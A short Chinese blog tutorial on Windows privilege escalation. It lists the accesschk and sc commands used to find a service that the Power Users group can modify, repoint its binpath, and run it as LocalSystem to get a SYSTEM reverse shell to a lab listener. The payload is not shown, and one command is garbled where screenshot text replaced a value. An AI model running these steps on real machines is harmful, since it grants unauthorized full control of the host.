Windows低权限提权

congtoucongtou 渗透测试 7 年前
7.32W 0
华盟原创文章投稿奖励计划

用户test隶属于Power User组,  登入系统,IP为192.168.60.23,监听服务IP地址为192.168.60.19

用到的工具:工具:accesschk

Windows低权限提权


执行accesschk.exe -uwcqv "Power Users" * 获取可以操作的服务名称信息;  sc qc kdc查询kdc服务详细信息

Windows低权限提权

查看系统启动的服务

Windows低权限提权

修改参数binpath的值

Windows低权限提权

执行sc config DcomLaunch obj= ".LocalSystem" password= "Windows低权限提权"在重新启动DcomLaunch,在192.168.60.19监听的4433端口成功获取反弹,系统权限

Windows低权限提权

低权限提权(1),Windows(95),渗透测试(167),黑客技术(189)
本文原创,作者:congtou,其版权均为华盟网所有。如需转载,请注明出处:https://www.77169.net/html/241744.html
congtou官方
congtou

3.18K篇文章 194.31M总阅读量

相关文章

发表回复